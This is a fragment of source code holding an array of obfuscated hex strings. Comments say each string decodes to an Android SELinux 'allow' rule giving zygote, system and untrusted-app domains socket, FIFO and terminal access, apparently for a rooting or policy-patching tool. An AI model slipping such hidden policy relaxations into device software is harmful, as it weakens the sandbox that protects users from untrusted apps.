    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:recovery:unix_stream_socket:write"
    "\x63\x53\x07\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:zygote:system_server:unix_stream_socket:connectto"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:zygote:system_server:unix_stream_socket:read"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:system_server:unix_stream_socket:write"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:zygote:system_app:unix_stream_socket:connectto"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:zygote:system_app:unix_stream_socket:read"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:system_app:unix_stream_socket:write"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:zygote:platform_app:unix_stream_socket:connectto"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:zygote:platform_app:unix_stream_socket:read"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:platform_app:unix_stream_socket:write"
    "\x63\x53\x07\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:zygote:untrusted_app:unix_stream_socket:connectto"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:zygote:untrusted_app:unix_stream_socket:read"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:untrusted_app:unix_stream_socket:write"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:zygote:init:fifo_file:read"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:init:fifo_file:write"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:zygote:init:fifo_file:ioctl"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:zygote:init:fifo_file:getattr"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:zygote:init_shell:fifo_file:read"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:init_shell:fifo_file:write"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:zygote:init_shell:fifo_file:ioctl"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:zygote:init_shell:fifo_file:getattr"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:zygote:recovery:fifo_file:read"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:recovery:fifo_file:write"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:zygote:recovery:fifo_file:ioctl"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x0e\x0b\x0c\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:zygote:recovery:fifo_file:getattr"
    "\x63\x53\x0e\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:system_server:untrusted_app:unix_stream_socket:connectto"
    "\x63\x53\x09\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:system_server:untrusted_app:unix_stream_socket:read"
    "\x63\x53\x0a\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:system_server:untrusted_app:unix_stream_socket:write"
    "\x63\x53\x0b\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:system_app:untrusted_app:unix_stream_socket:connectto"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:system_app:untrusted_app:unix_stream_socket:read"
    "\x63\x53\x07\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:system_app:untrusted_app:unix_stream_socket:write"
    "\x63\x53\x0d\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x00\x0c\x33\x33\x0a\x00\x39\x39\x0c", // "allow:platform_app:untrusted_app:unix_stream_socket:connectto"
    "\x63\x53\x08\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x37\x0a\x06\x09", // "allow:platform_app:untrusted_app:unix_stream_socket:read"
    "\x63\x53\x09\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x3a\x33\x0e\x3d\xdc\x30\x39\x37\x0a\x06\x32\xdc\x30\x0c\x00\x08\x0a\x39\xff\x34\x37\x0e\x39\x0a", // "allow:platform_app:untrusted_app:unix_stream_socket:write"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:zygote:devpts:chr_file:open"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:zygote:devpts:chr_file:read"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:devpts:chr_file:write"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:zygote:devpts:chr_file:ioctl"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:zygote:devpts:chr_file:getattr"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:zygote:untrusted_app_devpts:chr_file:open"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:zygote:untrusted_app_devpts:chr_file:read"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:zygote:untrusted_app_devpts:chr_file:write"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:zygote:untrusted_app_devpts:chr_file:ioctl"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x3f\x3e\x04\x0c\x39\x0a\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:zygote:untrusted_app_devpts:chr_file:getattr"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:system_server:devpts:chr_file:open"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:system_server:devpts:chr_file:read"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:system_server:devpts:chr_file:write"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:system_server:devpts:chr_file:ioctl"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:system_server:devpts:chr_file:getattr"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:system_server:untrusted_app_devpts:chr_file:open"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:system_server:untrusted_app_devpts:chr_file:read"
    "\x63\x53\x07\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:system_server:untrusted_app_devpts:chr_file:write"
    "\x63\x53\x07\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:system_server:untrusted_app_devpts:chr_file:ioctl"
    "\x63\x53\x09\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x30\x0a\x37\x3b\x0a\x37\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:system_server:untrusted_app_devpts:chr_file:getattr"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:system_app:devpts:chr_file:open"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:system_app:devpts:chr_file:read"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:system_app:devpts:chr_file:write"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:system_app:devpts:chr_file:ioctl"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:system_app:devpts:chr_file:getattr"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:system_app:untrusted_app_devpts:chr_file:open"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:system_app:untrusted_app_devpts:chr_file:read"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:system_app:untrusted_app_devpts:chr_file:write"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:system_app:untrusted_app_devpts:chr_file:ioctl"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x30\x3e\x30\x39\x0a\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:system_app:untrusted_app_devpts:chr_file:getattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:platform_app:devpts:chr_file:open"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:platform_app:devpts:chr_file:read"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:platform_app:devpts:chr_file:write"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:platform_app:devpts:chr_file:ioctl"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:platform_app:devpts:chr_file:getattr"
    "\x63\x53\x05\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:platform_app:untrusted_app_devpts:chr_file:open"
    "\x63\x53\x05\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:platform_app:untrusted_app_devpts:chr_file:read"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:platform_app:untrusted_app_devpts:chr_file:write"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0e\x0c\x00\x39\x31", // "allow:platform_app:untrusted_app_devpts:chr_file:ioctl"
    "\x63\x53\x08\x06\x31\x31\x0c\x34\xff\x35\x31\x06\x39\x0b\x0c\x37\x32\xdc\x06\x35\x35\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xdc\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:platform_app:untrusted_app_devpts:chr_file:getattr"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:untrusted_app:devpts:chr_file:open"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:untrusted_app:devpts:chr_file:read"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x3a\x33\x39\x37\x3a\x30\x39\x0a\x09\xdc\x06\x35\x35\xff\x09\x0a\x3b\x35\x39\x30\xff\x00\x0d\x37\xdc\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:untrusted_app:devpts:chr_file:write"
